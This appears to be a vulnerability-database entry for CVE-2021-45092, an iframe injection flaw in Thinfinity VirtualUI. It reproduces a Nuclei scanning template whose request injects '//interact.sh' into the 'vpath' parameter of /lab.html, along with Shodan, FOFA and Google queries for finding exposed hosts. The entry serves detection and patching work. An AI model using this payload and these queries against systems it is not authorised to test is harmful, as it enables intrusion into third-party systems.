Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-45092
HistoryDec 18, 2021 - 9:02 a.m.

Thinfinity Iframe Injection

2021-12-1809:02:44
ProjectDiscovery
github.com
3

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

6.3 Medium

AI Score

Confidence

High

0.058 Low

EPSS

Percentile

93.4%

A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the “vpath” parameter.

id: CVE-2021-45092

info:
  name: Thinfinity Iframe Injection
  author: danielmofer
  severity: critical
  description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default  could allow IFRAME injection via the "vpath" parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
  reference:
    - https://github.com/cybelesoft/virtualui/issues/2
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44848
    - https://www.tenable.com/cve/CVE-2021-45092
    - http://packetstormsecurity.com/files/166068/Thinfinity-VirtualUI-2.5.41.0-IFRAME-Injection.html
    - https://github.com/danielmofer/nuclei_templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-45092
    cwe-id: CWE-74
    epss-score: 0.05776
    epss-percentile: 0.93361
    cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cybelesoft
    product: thinfinity_virtualui
    shodan-query: http.title:"thinfinity virtualui"
    fofa-query: title="thinfinity virtualui"
    google-query: intitle:"thinfinity virtualui"
  tags: cve2021,cve,packetstorm,iframe,thinfinity,tenable,injection,cybelesoft

http:
  - method: GET
    path:
      - "{{BaseURL}}/lab.html?vpath=//interact.sh"

    matchers:
      - type: regex
        regex:
          - ".*vpath.*"
          - "thinfinity"
        condition: and
# digest: 4a0a00473045022100bb84742ce2f98cb5dc9e3e6c941a2e2bf6b3f29a3f01b73885699170e1e40ef002206f2bbef6532d0eb5149236a1fada5da49ba3d92a8e601fb0f991e18a858c352b:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

6.3 Medium

AI Score

Confidence

High

0.058 Low

EPSS

Percentile

93.4%